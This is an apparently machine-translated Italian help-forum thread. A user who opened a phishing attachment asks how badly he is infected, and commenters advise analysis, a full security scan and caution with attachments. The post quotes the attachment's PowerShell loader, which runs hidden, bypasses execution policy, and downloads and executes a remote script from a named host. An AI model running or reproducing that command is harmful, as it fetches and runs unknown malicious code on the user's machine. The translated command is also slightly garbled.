Come un vero IDIOT, ho aperto un allegato di posta elettronica che pretendeva di essere un collegamento ai dettagli di consegna su un ordine che avevo effettuato.
All'interno c'era un breve script POWER SHELL - C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe -WindowStyle nascosto -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient) .DownloadString (' http://clanmeeting.com/para/pam.ps1 '));
Qualcuno può aiutarmi e dirmi quanto sono "Merde".
Saluti Mike
5
Determina cosa fa lo script in questione, quindi inverti l'azione.
—
Ramhound
Ottieni un buon software per la sicurezza di Internet ed esegui una scansione completa. Allora saprai quanto è brutto. Se è davvero male, potrebbe essere necessario creare un disco offline per eseguire l'analisi.
—
AFH,
Il file che ha tentato di scaricare ( clanmeeting.com/para/pam.ps1 ) non esiste più. Quindi non possiamo guardarlo per dirtelo.
—
Ƭᴇcʜιᴇ007,
Non conosco assolutamente negozi online che ti inviano un allegato di posta elettronica quando acquisti qualcosa da loro. Normalmente ti inviano semplicemente la ricevuta via email e, molto raramente, ti invieranno sul loro sito Web per una ricevuta più dettagliata. Fatevi un favore, non aprite un allegato casuale a meno che non vi aspettaste un allegato, sappiate senza ombra di dubbio chi ha inviato l'allegato e non avete scannerizzato l'allegato. Non sono mai stato infettato da malware, perché non apro gli allegati, non ho assolutamente motivo di farlo.
—
Ramhound,
Non sono al passo con PowerShell, quindi non so se sono state intraprese azioni o meno.
—
Mike Stone,